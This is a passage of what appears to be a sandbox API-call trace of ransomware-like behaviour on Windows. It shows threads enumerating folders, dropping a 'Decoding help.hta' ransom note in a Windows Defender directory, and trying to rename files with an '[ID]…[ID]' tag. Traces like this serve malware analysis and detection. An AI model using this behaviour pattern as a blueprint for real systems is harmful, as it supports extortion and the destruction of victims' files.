hFindFile=0x5d8a10 | out: hFindFile=0x5d8a10) returned 1 Thread: id = 246 os_tid = 0x954 [0040.562] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\*.*", lpFindFileData=0x12ddfd30 | out: lpFindFileData=0x12ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a60b0 [0040.563] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.563] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x12ddfd30 | out: lpFindFileData=0x12ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.563] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.563] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.563] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x12ddfd30 | out: lpFindFileData=0x12ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Framework", cAlternateFileName="FRAMEW~1")) returned 1 [0040.563] lstrcmpW (lpString1=".", lpString2="Framework") returned -1 [0040.563] lstrcmpW (lpString1="..", lpString2="Framework") returned -1 [0040.563] lstrcmpiW (lpString1="windows", lpString2="Framework") returned 1 [0040.565] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\*.*" [0040.565] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\*.*") returned 55 [0040.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\", lpString2="Framework" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework" [0040.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*" [0040.565] GlobalMemoryStatus (in: lpBuffer=0x12ddfd10 | out: lpBuffer=0x12ddfd10) [0040.565] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11097870, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2cc [0040.566] CloseHandle (hObject=0x2cc) returned 1 [0040.566] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x12ddfd30 | out: lpFindFileData=0x12ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Framework", cAlternateFileName="FRAMEW~1")) returned 0 [0040.566] FindClose (in: hFindFile=0x5a60b0 | out: hFindFile=0x5a60b0) returned 1 Thread: id = 247 os_tid = 0x978 [0040.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*", lpFindFileData=0x890fd30 | out: lpFindFileData=0x890fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a90 [0042.092] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.092] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x890fd30 | out: lpFindFileData=0x890fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.092] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.092] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.092] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x890fd30 | out: lpFindFileData=0x890fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.092] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.092] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.092] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.092] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*" [0042.092] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*") returned 86 [0042.093] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0042.093] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*" [0042.093] GlobalMemoryStatus (in: lpBuffer=0x890fd10 | out: lpBuffer=0x890fd10) [0042.093] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d98800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0042.093] CloseHandle (hObject=0x53c) returned 1 [0042.093] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x890fd30 | out: lpFindFileData=0x890fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.093] FindClose (in: hFindFile=0x5d8a90 | out: hFindFile=0x5d8a90) returned 1 Thread: id = 248 os_tid = 0x6ec [0040.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*", lpFindFileData=0x868fd30 | out: lpFindFileData=0x868fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a10 [0042.078] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.078] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x868fd30 | out: lpFindFileData=0x868fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.078] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.078] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.078] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x868fd30 | out: lpFindFileData=0x868fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.078] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.078] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.078] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.078] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*" [0042.079] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*") returned 86 [0042.079] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0042.079] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*" [0042.079] GlobalMemoryStatus (in: lpBuffer=0x868fd10 | out: lpBuffer=0x868fd10) [0042.079] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a63000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x534 [0042.080] CloseHandle (hObject=0x534) returned 1 [0042.080] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x868fd30 | out: lpFindFileData=0x868fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.080] FindClose (in: hFindFile=0x5d8a10 | out: hFindFile=0x5d8a10) returned 1 Thread: id = 249 os_tid = 0x3d0 [0040.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*", lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23376857, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7dd0 [0040.580] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.580] FindNextFileW (in: hFindFile=0x5d7dd0, lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23376857, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.580] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.580] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.580] FindNextFileW (in: hFindFile=0x5d7dd0, lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe494541, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe494541, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpAsDesc.dll.mui", cAlternateFileName="")) returned 1 [0040.582] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" [0040.582] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned 47 [0040.582] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta" [0040.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\en-us\\decoding help.hta")) returned 0xffffffff [0040.582] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.829] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x87cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x87cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.830] CloseHandle (hObject=0x33c) returned 1 [0040.830] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.281] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpAsDesc.dll.mui") returned -1 [0041.281] lstrlenW (lpString="MpAsDesc.dll.mui") returned 16 [0041.281] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" [0041.281] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned 47 [0041.281] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\", lpString2="MpAsDesc.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui" [0041.281] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui" [0041.281] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui" (normalized: "c:\\program files\\windows defender\\en-us\\mpasdesc.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\en-us\\mpasdesc.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.281] FindNextFileW (in: hFindFile=0x5d7dd0, lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd37ad, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcd37ad, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpEvMsg.dll.mui", cAlternateFileName="")) returned 1 [0041.281] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" [0041.281] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned 47 [0041.281] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta" [0041.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\en-us\\decoding help.hta")) returned 0x1 [0041.281] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpEvMsg.dll.mui") returned -1 [0041.281] lstrlenW (lpString="MpEvMsg.dll.mui") returned 15 [0041.281] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" [0041.281] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned 47 [0041.281] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\", lpString2="MpEvMsg.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui" [0041.281] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui" [0041.281] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui" (normalized: "c:\\program files\\windows defender\\en-us\\mpevmsg.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\en-us\\mpevmsg.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.282] FindNextFileW (in: hFindFile=0x5d7dd0, lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe494541, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe494541, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsMpRes.dll.mui", cAlternateFileName="")) returned 1 [0041.282] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" [0041.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned 47 [0041.282] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta" [0041.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\en-us\\decoding help.hta")) returned 0x1 [0041.282] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MsMpRes.dll.mui") returned -1 [0041.282] lstrlenW (lpString="MsMpRes.dll.mui") returned 15 [0041.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*" [0041.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\*.*") returned 47 [0041.282] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\", lpString2="MsMpRes.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui" [0041.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui" [0041.282] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui" (normalized: "c:\\program files\\windows defender\\en-us\\msmpres.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\en-us\\msmpres.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.282] FindNextFileW (in: hFindFile=0x5d7dd0, lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe494541, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe494541, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsMpRes.dll.mui", cAlternateFileName="")) returned 0 [0041.282] FindClose (in: hFindFile=0x5d7dd0 | out: hFindFile=0x5d7dd0) returned 1 Thread: id = 250 os_tid = 0x948 [0043.296] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*", lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, 